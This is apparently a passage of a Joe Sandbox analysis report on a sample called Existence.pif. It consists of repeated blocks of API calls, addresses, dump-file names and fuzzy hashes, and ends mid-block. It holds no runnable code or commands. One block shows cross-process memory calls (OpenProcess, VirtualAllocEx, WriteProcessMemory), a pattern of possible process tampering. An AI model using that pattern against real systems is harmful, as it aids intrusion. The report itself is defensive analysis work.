                                                                                                                                                                                          • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?,?,00790C4E), ref: 0079091B
                                                                                                                                                                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790936
                                                                                                                                                                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790944
                                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?), ref: 00790954
                                                                                                                                                                                          • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00790831,80070057,?,?), ref: 00790960
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3897988419-0
                                                                                                                                                                                          • Opcode ID: 8f63801d9927f5b07af9068db4be580eda63c5bc88ec1f998e51a2094fcb9e50
                                                                                                                                                                                          • Instruction ID: ee263d3e356759164058bcf6557e5e1b307556fbbde19a965f914a8f27b941bf
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f63801d9927f5b07af9068db4be580eda63c5bc88ec1f998e51a2094fcb9e50
                                                                                                                                                                                          • Instruction Fuzzy Hash: E3018F76610204AFEB204F55EC48F9A7BEDEB44765F144128FD05E2212E779ED409BA0
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
                                                                                                                                                                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 842720411-0
                                                                                                                                                                                          • Opcode ID: 239bc1c13bfbe1de9317296a7c3475c69e4daaff34d05e9decf84bc93d0a04e1
                                                                                                                                                                                          • Instruction ID: 754804856ba5e9f69a3da02af28ac708cdb721ddeb6be1fbaadcbb3f60022851
                                                                                                                                                                                          • Opcode Fuzzy Hash: 239bc1c13bfbe1de9317296a7c3475c69e4daaff34d05e9decf84bc93d0a04e1
                                                                                                                                                                                          • Instruction Fuzzy Hash: 520181B5601606BFDF214F65EC48E6A3B6EEF843A4B218428F845D3360DB35DC50CA60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00791976
                                                                                                                                                                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00791982
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00791991
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00791998
                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 007919AE
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                          • Opcode ID: 3613dc7f339b26f33ad2708d375ba8fa519bc530e97f30a03cf9328517cfd9de
                                                                                                                                                                                          • Instruction ID: 6bf1ca7e5b11eaa1685c05ceccf894114e135908e75b63f33aa7986cee68db2c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3613dc7f339b26f33ad2708d375ba8fa519bc530e97f30a03cf9328517cfd9de
                                                                                                                                                                                          • Instruction Fuzzy Hash: 42F06D75240306ABDB214FA9EC59F563BADEF897A0F514428FE45C72A0CA78EC518A60
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00791916
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00791922
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00791931
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00791938
                                                                                                                                                                                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0079194E
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 44706859-0
                                                                                                                                                                                          • Opcode ID: b2326885d24d0f4189a6a2c96d1e6e1399eeff47aaf1f7ee579d3f6f609619b5
                                                                                                                                                                                          • Instruction ID: 2e635e946878d6d37ed1c6541ecaadccf80f3c244569799a4bdc7a0fb3ff5e8f
                                                                                                                                                                                          • Opcode Fuzzy Hash: b2326885d24d0f4189a6a2c96d1e6e1399eeff47aaf1f7ee579d3f6f609619b5
                                                                                                                                                                                          • Instruction Fuzzy Hash: AEF06275200306ABDB210FA9EC5DF563B6DEF897A0F514428FE45D7250CA78EC518A64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CCB
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CD8
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CE5
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CF2
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0CFF
                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,007A0B24,?,007A3D41,?,00000001,00773AF4,?), ref: 007A0D0C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandle
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2962429428-0
                                                                                                                                                                                          • Opcode ID: 785a6e43924d04afb1b515daaa0942c8e51fbd800488c9c677b09b4efef1739d
                                                                                                                                                                                          • Instruction ID: 78f9cf65213944731360670a631bf213ae252ba6ea710b26068d94989a65fb6f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 785a6e43924d04afb1b515daaa0942c8e51fbd800488c9c677b09b4efef1739d
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7201DC72801B15DFCB30AFA6D880812FBF9BE903253118F3ED09252921C7B4A848DE90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 007965BF
                                                                                                                                                                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 007965D6
                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 007965EE
                                                                                                                                                                                          • KillTimer.USER32(?,0000040A), ref: 0079660A
                                                                                                                                                                                          • EndDialog.USER32(?,00000001), ref: 00796624
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3741023627-0
                                                                                                                                                                                          • Opcode ID: 043c06e796d8336e818c3327640ef72d84a40bce3f9b6e0f1b818809234cfc0b
                                                                                                                                                                                          • Instruction ID: de6dd1b3a562e41fc9c565d298482f6ac6bc769cc07582c5cea6911d10e6a145
                                                                                                                                                                                          • Opcode Fuzzy Hash: 043c06e796d8336e818c3327640ef72d84a40bce3f9b6e0f1b818809234cfc0b
                                                                                                                                                                                          • Instruction Fuzzy Hash: E1011D70500704ABEF315B20EE4EF967BB8BB10745F01466DB586A10E1EBF8AA54CA95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAD2
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAE4
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DAF6
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DB08
                                                                                                                                                                                          • _free.LIBCMT ref: 0076DB1A
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 3c573f34ca7979b6987ae6ccf1ed7c0f62c24fcbdfd7e338bd20a69b743ff617
                                                                                                                                                                                          • Instruction ID: 7a5b70060a6a41f01a502ba7ce02b62785a0b14ba91090f52bec5583d8a4f67d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c573f34ca7979b6987ae6ccf1ed7c0f62c24fcbdfd7e338bd20a69b743ff617
                                                                                                                                                                                          • Instruction Fuzzy Hash: B3F06272B18604AB8670EB98E885C6A73EEEE043507954C05F80AD7501CB3CFC80C654
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _free.LIBCMT ref: 0076262E
                                                                                                                                                                                            • Part of subcall function 00762D38: RtlFreeHeap.NTDLL(00000000,00000000,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4), ref: 00762D4E
                                                                                                                                                                                            • Part of subcall function 00762D38: GetLastError.KERNEL32(00801DC4,?,0076DB51,00801DC4,00000000,00801DC4,00000000,?,0076DB78,00801DC4,00000007,00801DC4,?,0076DF75,00801DC4,00801DC4), ref: 00762D60
                                                                                                                                                                                          • _free.LIBCMT ref: 00762640
                                                                                                                                                                                          • _free.LIBCMT ref: 00762653
                                                                                                                                                                                          • _free.LIBCMT ref: 00762664
                                                                                                                                                                                          • _free.LIBCMT ref: 00762675
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                          • Opcode ID: 98878c06591e537295f81af9914968f43494293d26b1899837aa43d70b9961b2
                                                                                                                                                                                          • Instruction ID: 28fbbadaf5f6f8a5e123da3d4c29c254534ec162ba2fee26132522ae3928f2aa
                                                                                                                                                                                          • Opcode Fuzzy Hash: 98878c06591e537295f81af9914968f43494293d26b1899837aa43d70b9961b2
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF03A709059218BCEE2AF94EC098587BA5BB2A7A1300491BF816D2276CB7C0902BF85
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: __freea$_free
                                                                                                                                                                                          • String ID: a/p$am/pm
                                                                                                                                                                                          • API String ID: 3432400110-3206640213
                                                                                                                                                                                          • Opcode ID: 56b0c964ec86d654811c07a1a81d09e2cb7bb76376332e371b3db92d79d15103
                                                                                                                                                                                          • Instruction ID: 8eed765282f996a2aac5bbc6be19c81554799263bce2494825a59c635049173e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 56b0c964ec86d654811c07a1a81d09e2cb7bb76376332e371b3db92d79d15103
                                                                                                                                                                                          • Instruction Fuzzy Hash: 58D1F175900246DACB249F68C85DBBABBB1FF05300FAC415AED03AB651DB7D9D80CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 007A41FA: GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4229
                                                                                                                                                                                            • Part of subcall function 007A41FA: FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,007B52EE,?,?,00000035,?), ref: 007A4239
                                                                                                                                                                                          • GetLastError.KERNEL32(?,00000000,?,?,00000035,?), ref: 007B5419
                                                                                                                                                                                          • VariantInit.OLEAUT32(?), ref: 007B550E
                                                                                                                                                                                          • VariantClear.OLEAUT32(?), ref: 007B55CD
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ErrorLastVariant$ClearFormatInitMessage
                                                                                                                                                                                          • String ID: bny
                                                                                                                                                                                          • API String ID: 2854431205-1723156973
                                                                                                                                                                                          • Opcode ID: cf6fc731066537c716c3bcbb7464cb4f424d8a6c77de348e69462012266f3886
                                                                                                                                                                                          • Instruction ID: 4aadf276e3be253b7d8103ccb9a741ced6faac01d61568d3778e5dedd2cfed94
                                                                                                                                                                                          • Opcode Fuzzy Hash: cf6fc731066537c716c3bcbb7464cb4f424d8a6c77de348e69462012266f3886
                                                                                                                                                                                          • Instruction Fuzzy Hash: AAD14CB0A00649DFDB18DF94C495BEDBBB4FF08304F54811DE416AB292DB79A986CF50
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                                                                                                                          • String ID: CALLARGARRAY$bny
                                                                                                                                                                                          • API String ID: 157775604-235381603
                                                                                                                                                                                          • Opcode ID: 6e6c15d7fa879a08d58c769e17cbcd68145d4397c85dad8c1d5ce56753c87f4a
                                                                                                                                                                                          • Instruction ID: f9026650b28a981b09ca31719878256f60e5407623ae0b2e49d4271624d2dfce
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6e6c15d7fa879a08d58c769e17cbcd68145d4397c85dad8c1d5ce56753c87f4a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4F419D71A00209DFDB04DFA8C889AEEBBB5FF58364F104069E605A7252E7789D81CB90
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 0079BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00792B1D,?,?,00000034,00000800,?,00000034), ref: 0079BDF4
                                                                                                                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 007930AD
                                                                                                                                                                                            • Part of subcall function 0079BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00792B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 0079BDBF
                                                                                                                                                                                            • Part of subcall function 0079BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 0079BD1C
                                                                                                                                                                                            • Part of subcall function 0079BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00792AE1,00000034,?,?,00001004,00000000,00000000), ref: 0079BD2C
                                                                                                                                                                                            • Part of subcall function 0079BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00792AE1,00000034,?,?,00001004,00000000,00000000), ref: 0079BD42
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 0079311A
                                                                                                                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00793167
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                          • String ID: @
                                                                                                                                                                                          • API String ID: 4150878124-2766056989
                                                                                                                                                                                          • Opcode ID: 77c564dcf9a200a4b5324e6675370c4ec0cebc5517c81045cec7b185b1645cf6
                                                                                                                                                                                          • Instruction ID: 3d01ebf2c9385f2cdb3f951075956685241b31bc7f5369ae36d87aa0f757dca4
                                                                                                                                                                                          • Opcode Fuzzy Hash: 77c564dcf9a200a4b5324e6675370c4ec0cebc5517c81045cec7b185b1645cf6
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5412A72A0021CBEDF10DBA4DD86ADEBBB8EF49700F004095FA55B7191DA746F85CBA1
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\1151\Existence.pif,00000104), ref: 00761AD9
                                                                                                                                                                                          • _free.LIBCMT ref: 00761BA4
